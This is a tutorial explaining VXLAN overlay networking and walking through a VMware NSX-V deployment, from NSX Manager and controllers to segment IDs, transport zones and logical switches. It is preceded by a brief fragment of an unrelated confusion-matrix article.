| Includes the positive predictions the model got wrong (false positives) in its denominator | Disregards negative samples classified as positive (FP); only missed positives (FN) count against it |
A confusion matrix allows data scientists to understand how effective their machine learning algorithm is in making correct predictions. It also allows them to understand incorrect predictions and calculate the error rate to improve the machine learning lifecycle. | <urn:uuid:740f49d4-33a3-4960-9bee-3fa3bbc99713> | CC-MAIN-2022-40 | https://plat.ai/blog/confusion-matrix-in-machine-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00403.warc.gz | en | 0.863832 | 921 | 3.578125 | 4 |
Software-defined networking is revolutionizing the world of networking as we know it. It is doing for the networking world what server virtualization has accomplished for the datacenter. Software-defined networking is allowing organizations to overcome and even eliminate obstacles in the networking arena for the enterprise. It has also opened up a whole new world of possibilities.
VMware’s NSX is arguably one of the most popular software-defined networking (SDN) solutions in use today. VMware NSX-V uses an overlay encapsulation protocol called Virtual Extensible LAN (VXLAN) to create the overlay network used to create the virtual networks. What is VXLAN? Why is it required? What role does it play in virtual networking? What is the difference between VXLAN and traditional VLANs? How are VXLANs configured using VMware NSX-V?
Importance of network virtualization
Organizations are increasingly adopting cloud technologies and infrastructure, which bring increasingly virtualized constructs along with the move toward cloud environments. Complex modern applications may require connectivity to components located in many different geographic regions. Network virtualization allows virtual servers in different locations to connect to the same logical network.
Network virtualization has made possible more robust east-west data center traffic than the more traditional north-south traffic flow between client-server architectures. Also, businesses today are moving at a rapid pace. One of the appealing facets of the cloud is the agility provided to provision infrastructure, including networks. Traditional network infrastructure has long been a roadblock to efficient and quick infrastructure provisioning. Making changes to typical physical network environments could take weeks with the various change control and technical configuration involved.
What is VXLAN?
VXLAN is an encapsulation protocol initially documented by the IETF in RFC 7348. It allows software solutions to tunnel Layer 2 communication over Layer 3 networks. VXLAN encapsulates Layer 2 network frames within UDP datagrams and transmits them across Layer 3 boundaries. So, simply put, it encapsulates Layer 2 frames inside Layer 3 packets. Compared to the relatively limited number of Layer 2 VLANs possible, VXLAN offers the ability to create up to 16 million logical networks providing Layer 2 adjacency across Layer 3 IP networks. This increased scalability is made possible by a 24-bit identifier carried in the VXLAN header, known as the VXLAN Network Identifier (VNI).
The increased scalability is an excellent feature for service providers and others who may have many different tenants. The 16 million VNIs mean a unique ID can be assigned to potentially millions of customers, and this ID can remain unique across the entire network. Like a VLAN ID, the VNI establishes a boundary that provides isolation from one tenant to another. Since the VXLAN protocol is based on an IETF standard, it is an open standard not reliant on any particular vendor solution. The VXLAN encapsulation protocol provides the underlying technology upon which network virtualization solutions can be built.
Another point to consider with VXLAN is that it is not merely a technology that can only be taken advantage of by virtualized solutions. VXLAN is an encapsulation protocol that can also be used by hardware devices that have the feature built-in. An example of a VXLAN-aware device is the Cisco Nexus 9000-EX platform.
There is another unique construct of VXLAN that is important to understand. The VXLAN Tunnel Endpoint (VTEP) is responsible for encapsulating and decapsulating the Layer 2 frame traffic. The VTEP can be a virtualized solution like VMware NSX-V or a hardware gateway. Creating the VXLAN VTEPs is part of configuring a VXLAN implementation. We will see how this is configured in VMware NSX-V.
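To make the encapsulation concrete, the sketch below builds the 8-byte VXLAN header defined in RFC 7348 in plain Python: a flags byte with the I bit set, reserved fields, and the 24-bit VNI. A VTEP prepends this header (together with outer Ethernet, IP, and UDP headers) to the original Layer 2 frame; the sketch only illustrates the header layout and is not how NSX-V itself is implemented:

```python
import struct

def vxlan_header(vni: int) -> bytes:
    """Build the 8-byte VXLAN header from RFC 7348 for a given 24-bit VNI."""
    if not 0 <= vni < 2 ** 24:
        raise ValueError("VNI must fit in 24 bits (0 .. 16,777,215)")
    flags = 0x08       # 'I' bit set: the VNI field is valid
    # First 32-bit word: flags byte followed by 24 reserved bits.
    # Second 32-bit word: 24-bit VNI followed by 8 reserved bits.
    return struct.pack("!II", flags << 24, vni << 8)

# Hypothetical VNI taken from a segment ID pool such as 5000-5999.
print(vxlan_header(5001).hex())   # '0800000000138900'
```

Together with the outer headers, this adds roughly 50 bytes of overhead per frame, which is why the physical underlay MTU is typically raised (for example, to 1600 bytes) when VXLAN is deployed.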
Overlay vs. Underlay
The VXLAN encapsulation of Layer 2 frames inside Layer 3 packets creates what is known as an overlay. In contrast, the physical IP network that transmits the packets constitutes the underlay. The network overlay creates a layer of abstraction that allows the virtualized network to run "on top of" the physical network.
The network overlay is created when a packet or frame is encapsulated at its source and transmitted to the destination edge device. The encapsulation adds an outer header that allows the intermediary network devices to transmit the packet and forward it based on the outer header. They remain unaware of the original packet payload with the Layer 2 frame underneath. Once the packet arrives at the destination, the packet is decapsulated, and the receiving device strips off the outer header. The encapsulation process described is handled with an encapsulation protocol such as VXLAN.
This overlay created through the encapsulation protocol allows Layer 2 boundaries to stretch across the Layer 3 network underlay. In traditional physical networks without network virtualization, Layer 2 segments are not "routed" or carried across Layer 3 boundaries. Certain technologies in the physical world, such as EoMPLS, VPLS, and OTV, allow stretching Layer 2 segments across routed boundaries, but their implementation and flexibility aren't nearly as seamless as VXLAN.
One of the tremendous advantages of the overlay and underlay network design is that it decouples the configuration of the overlay from the configuration of the underlay. You can make changes in the overlay network without affecting the underlay and vice versa. However, it is important to note that the stability and reachability of the underlay network affect the overlay networks created on top of it.
- Underlay – The underlay network includes the physical Layer 3 IP network used to transmit packets. The physical IP network includes all the physical hardware, cabling, and routing protocols used to transmit and receive these packets. OSPF, IS-IS, and BGP are examples of standard routing protocols for this purpose.
- Overlay – The overlay network is formed “on top of” the underlay physical network architecture. Configuration of the overlay network is decoupled from the configuration of the underlay network. Multiple virtual networks can overlay on top of a single physical network. Standard routing protocols are used to transmit VXLAN encapsulated packets.
Logical Overview of the VXLAN overlay network
VXLAN vs. VLAN
Those familiar with traditional networking constructs like VLANs will note similarities between the functionality of VXLAN and VLANs. VLANs provide a Layer 2 boundary in conventional networking that provides the “home” for a particular IP subnet. However, when comparing VLAN and VXLAN, the capabilities of VXLAN exceed those found in traditional VLANs in several areas. Let’s look at a quick comparison:
- VLANs allow some 4000+ different network segments
- VXLANs allows 16 million different network segments
- VLAN IDs are 12 bits in length, while VXLAN VNIs are 24 bits
- VLANs require trunking, whereas VXLAN does not
- VXLAN does not require spanning tree
- VLANs require physical network configuration
- VXLAN does not require physical network configuration to segment traffic
VMware NSX-V VXLAN Implementation
VMware NSX-V uses VXLAN as its network overlay encapsulation technology. It allows the creation of isolated multi-tenant broadcast domains and enables customers to create logical networks that span physical networks and underlying network locations. VMware NSX-V networking makes use of VXLAN to create logical networks and abstract networking resources.
It does this in much the same way that compute resources are virtualized and combined into pools of resources consumed in the vSphere environment. VMware NSX-V allows doing this with VXLAN across clusters, pods, and even geographically separated data centers. As described above, VXLAN creates Layer 2 logical networks encapsulated in standard Layer 3 IP packets. A unique identifier called the Segment ID exists in each encapsulated frame and designates the VXLAN logical network it belongs to. It is different from a VLAN tag, as we will see a bit later. The Segment IDs allow creating isolated Layer 2 VXLAN networks that can coexist on the same Layer 3 network.
You may wonder where the encapsulation happens in VMware vSphere with NSX-V. The encapsulation is carried out between the virtual NIC of the guest workload VM and the logical port on the vSphere virtual switch, so the process is transparent to both the guest VM and the underlying Layer 3 network infrastructure. How does a server or device outside of the VXLAN construct communicate with nodes on the VXLAN segment? That is made possible by the NSX Edge services gateway appliance, which translates VXLAN segment IDs to the VLAN IDs needed for communication between the VMs on the VXLAN and these physical devices. What infrastructure is required to create the VXLAN VMware configuration?
VMware NSX-V is the NSX Data Center solution for vSphere environments. The NSX Manager is a special-purpose service VM (SVM) that provides the GUI and REST APIs needed to create, configure, and monitor NSX components. These components include the NSX Controllers, logical switches, and edge services gateways. The NSX Manager is the centralized network management component of NSX Data Center for vSphere. VMware packages the NSX Manager for NSX-V as an OVA appliance deployed into a VMware vSphere environment. It is the first component of the NSX-V infrastructure you provision when setting up NSX-V.
Installing VMware VXLAN using NSX-V Manager
Let’s take a look at installing VMware VXLAN using the NSX-V Manager appliance in VMware vSphere. Deploying the VMware NSX-V Manager appliance is the first step to deploy VXLAN in your vSphere environment. After deploying the NSX-V Manager, you will integrate it with vCenter Server, which makes installing the special VMware NSX-V VIBs possible in your vSphere clusters. Once the VMware NSX-V Manager appliance is integrated with vCenter Server, you can configure VXLAN and the other logical constructs that make up your vSphere virtualized network.
After you download the VMware NSX-V Manager OVA appliance file, you deploy this using the standard means in the vSphere Client. Choose the OVA file on the Deploy OVF Template wizard.
Choosing the NSX-V Manager OVA
Select the name of the NSX-V Manager appliance and the folder location in your vSphere datacenter.
Choose the virtual machine name and folder
Select the compute resource in which you will run the NSX-V Manager appliance. It is standard best practice to run service VMs such as the VMware NSX-V Manager in a management cluster that houses other infrastructure VMs such as vCenter, vROPs, and others.
Choose the compute resource from your VMware vSphere datacenter
The wizard will display the initial deployment details for review.
Review the details of the VMware NSX-V Manager deployment
Next, select the datastore in which you want to deploy the VMware NSX-V Manager. You can also select the disk format during the deployment.
Choose the storage and disk policy
Select the virtual network to attach the VMware NSX-V manager appliance. This network connection is for connecting to the management interface that you will configure during the template customization process.
Choose the port group for the management network for the VMware NSX-V Manager
There are many important details to give attention to in the template customization step. Here you will configure the passwords for accessing the manager appliance as well as the pertinent network configuration information.
Customize the NSX-V Manager template
Finally, we arrive at the summary screen that displays the configuration before finalizing the deployment. Make sure all the information shown is correct before clicking Finish.
Ready to complete and finalize the VMware NSX-V Manager appliance deployment
Integrate VMware NSX-V Manager with vCenter Server
To enable VMware NSX-V's functionality and configure VMware VXLAN in your environment, you integrate the newly deployed VMware NSX-V Manager with VMware vCenter Server. Doing this involves registering the vCenter Server Lookup Service URL and the vCenter Server hostname. For most environments that run the embedded Platform Services Controller configuration (recommended) with vCenter Server, both will point to the same address.
Registering the Lookup Service URL and vCenter Server address
Deploy NSX Controller Cluster
After deploying the NSX Manager and integrating it with vCenter Server, you will want to deploy the NSX Controller Cluster in your environment. The NSX Controller provides essential functionality in VMware NSX-V virtualized networking. The NSX Controller provides the control plane functions for NSX logical switching and Distributed Logical Router (DLR) functionality.
The NSX Controller maintains information about all hosts and logical switches and distributed logical routers in the environment. The Logical Switches are the VXLANs in the vSphere environment. The NSX Controller is a required component if you want to deploy DLRs and VXLAN in unicast or hybrid operation mode.
To deploy the NSX Controller, navigate to Networking and Security > Installation and Management > NSX Controller Nodes and choose to Add a new Controller Node.
Adding a new NSX Controller Node
Choosing the Add function launches the Add Controller wizard. First, choose a password for the controller.
Configuring a password for the NSX Controller Node
Next, on the Deployment & Connectivity screen, choose a name for the controller, datacenter, cluster/resource, datastore, host, folder, IP Pool, and select which vSphere Distributed Switch it will connect.
Configuring deployment and connectivity options for the VMware NSX Controller Node
After completing the wizard, the NSX Controller Node will begin deploying. The deployment will generally take a few minutes. As a note, you will want to deploy three controller nodes for high availability in a production environment.
New NSX Controller Node is deployed successfully
Now, let’s prepare the ESXi hosts in the vSphere cluster for VMware VXLAN configuration.
Preparing ESXi Hosts for VMware VXLAN
One of the first steps you will go through to prepare the ESXi hosts for VMware VXLAN is installing NSX. This process installs the special VMware NSX-V ESXi VIBs needed for interacting with VMware NSX-V. Under the Networking and Security > Host Preparation screen, you will see your vSphere cluster(s) displayed with the option to Install NSX. Click the Install NSX button.
Before proceeding, you need to have a valid VMware NSX Data Center license installed before installing the NSX VIBs on your vSphere cluster ESXi hosts.
Choosing to Install NSX
Verify the installation of the VMware NSX-V VIBs
Configure VMware VXLAN
After installing the special VMware NSX-V VIBs on your vSphere cluster ESXi hosts, the next step is configuring VXLAN. Configuring VMware VXLAN on your vSphere cluster ESXi hosts is the process that creates the VXLAN VTEPs on your ESXi hosts used for encapsulating and decapsulating the Layer 2 frames sent via network virtualization.
On the Networking and Security > Installation and Upgrade > Host Preparation screen, after installing the NSX VIBs, choose to Configure the VXLAN.
Configuring VXLAN as part of the VMware NSX-V configuration
The Configure VXLAN Networking dialog box appears. Here you choose the vSphere Distributed Switch you want to use for VXLAN traffic and how you want to assign IP addresses to the vmkNICs created as VTEP endpoints. You can also configure the vmkNIC Teaming Policy.
Configuring VMware VXLAN networking
Once you click Save, you will see the VXLAN configuration turn to a green checkmark showing it is configured. When you click the View configuration link, you can view the configured settings.
VXLAN successfully configured in VMware NSX-V
After configuring the VXLAN settings, on the Logical Network Settings tab, you will see the default VXLAN port shown – 4789. As noted, you will want to verify the VXLAN port is allowed between the various ESXi VXLAN hosts, particularly if these reside in different networks and need to form VXLAN tunnels.
On the Logical Network Settings tab, the Segment ID configuration is where you define the range of VNIs that will be handed out to logical switches.
Verifying the VXLAN port and editing Segment IDs
On the Edit Segment ID Settings dialog box, you choose a Segment ID pool range. The Segment ID range will essentially be the pool of VNIs (VXLAN Network Identifiers) assigned to the logical networks. Note, this is a range and not a single value.
Assigning a Segment ID pool
Next, we need to create the Transport Zones that define the scope of any Logical Switches or Distributed Logical Routers (DLRs) created. A Transport Zone controls which hosts a logical switch can reach, and it can span one or more vSphere clusters. It also defines which clusters and, by extension, which virtual machines can participate in a particular logical network.
Beginning the process to create VMware NSX-V Transport Zones
When creating a new Transport Zone, you define the Transport Zone’s name, its replication mode and select which clusters participate.
Creating a new Transport Zone
At this point, we have everything configured and ready to go for starting to create the Logical Switch (VXLAN) constructs in the environment. After assigning a Segment ID pool, we will start allocating logical resources as part of the VMware VXLAN implementation. Below, as you can see, the VXLAN configuration has been completed for the ESXi hosts in the vSphere cluster and we have “green” indicators across the board which is what we want to see.
VXLAN VMware configuration completed
VXLAN VMware Logical Switch Configuration
After completing the infrastructure configuration required for VMware NSX-V, we are now ready to create Logical Switches. Each Logical Switch is essentially a VXLAN in the environment. Navigate to Networking and Security > Logical Switches. Click the Add button to create a new Logical Switch.
Creating a new VMware NSX-V Logical Switch
You will configure the Logical Switch name, description, Transport Zone, Replication mode, IP Discovery, and MAC learning settings on the New Logical Switch dialog.
Configuring a new VMware NSX-V Logical Switch (VXLAN)
The new VMware NSX-V Logical Switch is created successfully. You will note the Segment ID configured uses the first available segment ID in the segment ID range configured earlier.
A VXLAN Logical Switch created in VMware NSX-V
Once the new Logical Switch is created, it will appear in the list of available networks to which a new virtual machine can be connected.
Connecting a new virtual machine to a new Logical Switch
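Everything shown above in the vSphere Client can also be driven through the NSX Manager REST API mentioned earlier. The sketch below lists transport zones and creates a logical switch with Python and the requests library. The endpoint paths and XML payload follow the NSX-V ("virtual wire") API as commonly documented, but treat them as assumptions and verify them against the NSX Data Center for vSphere API guide for your version; the hostname, credentials, and transport zone ID are placeholders:

```python
import requests

NSX_MANAGER = "https://nsx-manager.lab.local"   # placeholder NSX Manager address
AUTH = ("admin", "changeme")                    # placeholder credentials
HEADERS = {"Content-Type": "application/xml"}

# List the transport zones ("scopes" in the NSX-V API).
scopes = requests.get(f"{NSX_MANAGER}/api/2.0/vdn/scopes",
                      auth=AUTH, headers=HEADERS, verify=False)  # lab only: self-signed cert
print(scopes.status_code, scopes.text[:200])

# Create a logical switch ("virtual wire") in a given transport zone.
payload = """<virtualWireCreateSpec>
    <name>LS-App-Tier</name>
    <description>Logical switch created via the REST API</description>
    <tenantId>default</tenantId>
</virtualWireCreateSpec>"""

resp = requests.post(f"{NSX_MANAGER}/api/2.0/vdn/scopes/vdnscope-1/virtualwires",
                     data=payload, headers=HEADERS, auth=AUTH, verify=False)
print(resp.status_code, resp.text)   # the new virtual wire ID is returned on success
```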
VXLAN is a robust encapsulation protocol used to create software-defined overlay networks that stretch Layer 2 segments across routed boundaries. It offers many benefits compared to conventional VLAN segments. Using VXLAN software-defined networks decouples the overlay network configuration from the underlay physical network, allowing configuration changes on either the overlay or underlay without interdependencies between them. VXLAN encapsulates a Layer 2 Ethernet frame within an IP packet, and these packets are transmitted across the IP network and encapsulated/decapsulated by the VXLAN Tunnel Endpoints (VTEPs).
VMware NSX-V is VMware’s software-defined networking technology based on VXLAN encapsulation that allows easily building out VXLAN-based SDN in VMware vSphere environments. As shown, various components allow creating the VXLAN tunnel in a VMware vSphere environment. These include the NSX Manager, NSX Controller, ESXi VIBs, Segment IDs, and Transport Zones.
By configuring the required VXLAN VMware components, you can provision Logical Switches in the environment, each representing a VXLAN segment that carries Layer 2 communication over the physical IP network. Using this approach, VMs that reside across Layer 3 boundaries can be connected to the same Logical Switch and communicate as if they were attached to the same physical network switch.